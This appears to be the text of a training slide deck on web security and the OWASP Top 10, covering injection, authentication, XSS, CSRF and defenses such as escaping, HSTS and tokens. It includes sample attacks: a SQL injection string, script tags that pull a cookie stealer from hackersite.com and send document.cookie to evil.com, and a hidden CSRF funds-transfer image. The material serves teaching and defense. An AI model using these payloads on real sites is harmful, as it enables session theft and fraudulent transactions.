This document discusses web security and the OWASP organization. It provides an overview of the OWASP top 10 vulnerabilities, including injection, broken authentication, cross-site scripting, and insecure APIs. It also outlines techniques for preventing these vulnerabilities, such as input validation, encryption, access control, and keeping components up to date. Testing tools mentioned include OWASP ZAP and SQLMap.

1. Web Security & OWASP
By-Isuru Samaraweera

2. Agenda
• What is web security and why?
• Introduction to OWASP
• OWASP top 10
• OWASP Security testing tools
• General Security testing tools
• Q & A

3. What is web security and why?
• Security of websites, web applications and web services.
• Emergence of Web 2.0
• Intruders exploits vulnerabilities
• Techniques XSS,Sql Injection etc
• Attacker profiles
• Catastrophic security hacks
• Sony Entertainment 2011- 77 million accounts with credit card numbers
• JP Morgan chase 2014 -7.6million account information
• Master Card- 2005 -40 million accounts
• Business risk
• Trust issues
• Overhead costs
• Security checkpoints and techniques
• Early stages of development

4. OWASP(https://www.owasp.org)
• The Open Web Application Security Project (OWASP)
• Non profit organization, open community
• Vulnerabilities, threats, attacks and countermeasures
• Development guide
• https://www.owasp.org/index.php/Projects/OWASP_Development_Guide
• Testing guide
• https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
• Code review guide
• https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
• Webgoat sample web application
• https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
• Mailing lists
• https://lists.owasp.org/mailman/listinfo
• Newsletter
• https://www.owasp.org/index.php/Category:OWASP_Newsletter
• Many more…

5. OWASP top 10 (2017)
• Injection
• Broken Authentication and Session Management (XSS)
• Cross Site Scripting (XSS)
• Broken access Control
• Security Misconfiguration
• Sensitive Data Exposure
• Missing Function Level Access Control
• Cross Site Request Forgery (CSRF)
• Using Components with Known Vulnerabilities
• Under protected APIs

6. (#1)-Injection
• Send untrusted data into the system
• Text based attacks
• External,internal parties
• SQL,LDAP,JPQL,Xpath,Nosql
• String query = "SELECT * FROM user_data WHERE lastName='" +
request.getParameter(“lastName") + "'";
• Query HQLQuery = session.createQuery(“FROM user_data WHERE
lastName ='“ + request.getParameter(“lastName") + "'");
• http://example.com/app/userView?lastName=' or '1'='1

8. Preventing Injection
• Avoid dynamic queries
• Parameterized queries
• PreparedStatement,SQLCommand,PDO
• Stored procedures
• Input validation
• Carefully escape especial characters if no api is available
• OWASP Enterprise Security API
• ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam );
• Use code analysis tools
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

9. (#2)-Broken Authentication and Session
Management
• Custom authentication , Session management with flaws
• Credentials not protected with hashing
• Insider attacks
• Credentials can be guessed
• Session id exposed in the url->session fixation
• Session id won’t timeout
• Session ids are not rotated on success logins
• http://website.com/login.php?;jsessionid=
2P0OC2JSNDLPSKHCJUN2JV&d

10. Protecting the Password
• Hashing
• Transport
• Storage

11. Crack Password Hash
• Dictionary attack
• File containing words, phrases, common passwords
• Brute-force attack
• Tries every possible combination of characters up to a given length.
• Look up table
• Dictionary in a lookup table data structure
• Rainbow table
• High performance lookup

12. User Registration with Salt
• App post the username foo@example.com with
Password pass
• Server generates a random salt r
• Server computes h=H(r|pass)
• Server stores (foo@example.com,hash,r) in DB

13. Simplified login flow
• App Post username foo@example.com and password
Pass
• Server lookup the salt using the user id
• Server compute the hash h’=H(r|’pass’)
• If(foo@example.com,h’) exists in db allow login

14. Attack on password database

15. Hashing with key and random salt
• Is it safe?

16. Hashing recipe
• Bind password hash value to account
• Use application secret
• Follow password hashing best practices

17. Transport Security of a password

18. Hashing the password on client

19. Encrypt the password
• Asymmetric encryption
• Problems?

20. Preventing broken authentication contd…
• Implement Proper Password Strength Controls
• Password Length >10<128
• Pasword Complexity
• at least 1 uppercase character (A-Z)
• at least 1 lowercase character (a-z)
• at least 1 digit (0-9)
• at least 1 special character (punctuation) — do not forget to treat space as special
characters too
• Not more than 2 identical characters in a row (e.g., 111 not allowed)

21. Preventing broken authentication contd..
• Authentication and Error Messages
• respond with a generic error message
• Incorrect Response Examples
• "Login for User foo: invalid password"
• "Login failed, invalid user ID"
• "Login failed; account disabled"
• "Login failed; this user is not active“
• Correct Response example
• "Login failed; Invalid userID or password"

22. Preventing broken authentication contd..
• Prevent brute force attacks
• Account lock out
• Multifactor authentication
• Logging and Monitoring
• Use of authentication protocols that require no password
• Oauth
• OpenId
• Saml
• Leverage available frameworks and tools
• Apache Shiro
• Spring security
• Owasp esapi
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet

23. Preventing Session Management issues
• Secure login over Https
• Password submitted encrypted
• Immediate redirect to http
• Session id sent in clear text-<Vulnerability

24. Preventing Session Management issues contd..
• User requests HTTP page,response redirects to HTTPS
• 302 Response is HTTP Vulnerability point

25. Preventing Session Management issues contd..
• HSTS –Http Strict Transport Layer security
• Opt-in security control
• Instructs browser upgrade the security for STS
• HSTS forces
• All communications over HTTPS
• No insecure http requests sent from browser
• No option for user to override untrusted certificates

26. Enabling HSTS
• In Apache add below to .htaccess
• # Use HTTP Strict Transport Security to force client to use secure
connections only
Header always set Strict-Transport-Security "max-
age=300; includeSubDomains; “
Max-age =>The time, in seconds, that the browser should remember that this
site is only to be accessed using HTTPS.
includeSubDomains=>If this optional parameter is specified, this rule applies
to all of the site's subdomains as well.
• Can be done in Nginx,IIS etc

27. Preventing Session Management issues
contd..
• HTTP Strict Transport Security (HSTS)
• Cookies
• Secure
• <secure>true</secure>
• HttpOnly
• <http-only>true</http-only>
• Cache-Control: no-cache,no-store
• Pragma: no-cache
• New session ids on consecutive logins

28. • https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
• https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_authentication
• https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_
Sheet

29. (#3)-Cross Site scripting(XSS)
• Text-based attack scripts that exploit the interpreter in the browser.
• The attacker adds the following comment:
• Great price for a great item! Read my review here <script
src="http://hackersite.com/authstealer.js"> </script>.
• Document.location=http://evil.com?id=document.cookie

30. Inject malicious HTML

31. Preventing XSS
• Html escape before inserting untrusted data
• String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
• & --> &amp;
• < --> &lt;
• > --> &gt;
• JavaScript Escape Before Inserting Untrusted Data
• <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
• String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter(
"input" ) );
• Css Escape Before Inserting Untrusted Data
• <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING
HERE...; } </style>
• String safe = ESAPI.encoder().encodeForCss( request.getParameter( "input" ) );

32. Preventing XSS contd…
• URL Escape Before Inserting Untrusted Data
• <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE
PUTTING HERE...">link</a >
• String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );
• XSS Filters-Block requests with dangerous tags,scripts
• OWASP antisamy project
• HTML and CSS encoding.
• https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
• Html sanitizer project
• https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
• https://github.com/mganss/HtmlSanitizer
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Che
at_Sheet

33. (#4)-Broken access Control
• Unprivileged function access
• http://example.com/app/getappInfo
• http://example.com/app/admin_getappInfo
• Unauthorized data access
• htttp://soomebank.com/showacct?id=101
• http://soomebank.com/showacct?id=102
• Prevention
• Access control matrix
• Check access
• Do not assume that users will be unaware of special or hidden URLs or APIs.
• Penetration tests
• Regular audits, code reviews, Automated verification
• Principle of lease privilege
• Principle of defense in depth
• https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference
• https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access

34. (#5)-Security misconfiguration
• Can happen at any level
• Web server
• App server
• Database
• Custom code
• Out of date software
• Unnecessary ports,services
• Error message throws stack trace?
• Framework settings set to secure value?(struts,spring,.net etc)
• Prevention
• Frequent audits
• Deployment process
• Automate configuration validity
• https://www.owasp.org/index.php/Configuration
• https://www.owasp.org/index.php/Error_Handling
• https://www.owasp.org/index.php/Testing_for_configuration_management
• https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)
• https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management

35. (#6)-Sensitive data exposure
• Passwords ,credit card numbers etc (transit or rest)
• Not encrypting sensitive data
• Use weak keys and algorithms to encrypt
• SSL not enabled in the entire path
• Prevention measures
• Encrypt sensitive data accurately
• AES-256
• Key encrypting key
• Hardware security modules
• RSA 2048
• Don’t store sensitive data unnecessarily
• Disable caching and auto completion
• https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_SSL-TLS

36. (#7) -Insufficient Attack Protection
• Inability to detect, prevent, and respond to both manual and automated
attacks
• Attack with OWASP ZAP,SQL map tools(http://sqlmap.org/)
• Manual human attack
• Detect attacks -> OWASP App sensor
• An input a legitimate client can’t generate?
• Unusual usage patterns, repeated requests, spikes?
• Respond to attacks->OWASP App sensor
• Decide whether to automatically block requests,
• IP addresses, or IP ranges.
• Consider disabling or monitoring misbehaving user accounts.
• Patch quickly

37. Monitor security

38. • Monitor log files
• Monitor network bandwidth

39. • https://www.owasp.org/index.php/OWASP_AppSensor_Project
• https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_A
pplications
• https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_
Sheet
• https://www.owasp.org/index.php/Virtual_Patching_Cheat_Sheet
• https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_R
ule_Set_Project
• https://www.owasp.org/index.php/Intrusion_Detection

40. (#8)-Cross Site Request Forgery
• Attacker trick the victim with urls
• Execute unwanted actions
• Compromise the entire application
• http://example.com/app/transferFunds?amount=1500&destinationAccou
nt=4673243243
• Attacker emails below url to the victim
• <img src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#“ width="0" height="0"
/>

41. Preventing CSRF
• Include unique token in hiddenfield
• Verify the token on each request
• CSRFGuard
• Reauthenticate
• https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
• http://lists.owasp.org/pipermail/owasp-csrfguard

42. (#9)-Using components with known
vulnerabilities
• Outdated libraries
• Apache CXF Authentication Bypass (2012)
• Call with no identity token => invoke any web service with full permission
• Spring Remote Code Execution(2011/2012)
• Expression Language flow=>Execute arbitrary code on the server
• Struts2 Remote code execution(2017)
• Mishandles file upload
• Content-Type header flow=>Execution of arbitrary code on the server

43. Preventing Using components with known
vulnerabilities
• Identify all components and dependent libraries
• OWASP_Dependency_Check
• https://www.owasp.org/index.php/OWASP_Dependency_Check
• Retire.js
• https://github.com/retirejs/retire.js/
• Monitor security of these components
• Mailing lists
• Official sites
• Security policy on 3rd party libraries
• Software development practices to use
• Passing security tests
• Acceptable licenses
• Wrappers to expose only the required function in an api
• https://cve.mitre.org/about/
• https://www.owasp.org/index.php/Virtual_Patching_Best_Practices

44. (#10)- Underprotected APIs
• REST, JSON, and XML APIs
• Mobile app connecting to remote API(Username,password and accountnum)
• Public SMS JSON API->SQL injection
• XML XXE
• External entity is processed by XML parser
• Prevention
• Secured communications between the client and your APIs.
• Strong authentication scheme for your APIs,
• Parser configuration is hardened against attack.
• Protect against injection of all forms
• https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
• https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet

46. OWASP Testing tools
• The OWASP Application Security Verification Standard (ASVS) Project
• Test ,web application technical security controls
• Requirements for secure development.
• Procurement
• https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verificatio
n_Standard_Project
• OWASP live CD project
• Best open source security tools into a single bootable environment
• Boot from this Live CD or run VM
• Access to a full security testing suite
• No configuration required
• OWASP ZAP
• https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools

47. General Security Testing tools
• Iron Wasp(https://ironwasp.org/)
• Over 25 kinds of web vulnerabilities
• Wireshark(https://www.wireshark.org/)
• Network packet analyzer.
• Google Nogotofail( https://github.com/google/nogotofail)
• Known TLS/SSL vulnerabilities and misconfigurations.
• SQlMap( http://sqlmap.org/)
• Sql Injection
• Qualys(https://www.qualys.com)

48. Security code review
• Fastest and accurate
• Data Validation
• Authentication
• Session management
• Authorization
• Cryptography
• Error handling
• Logging
• Security Configuration
• Network Architecture
• Tools
• Code crawler
• Orizon
• O2
• FindSecurityBugs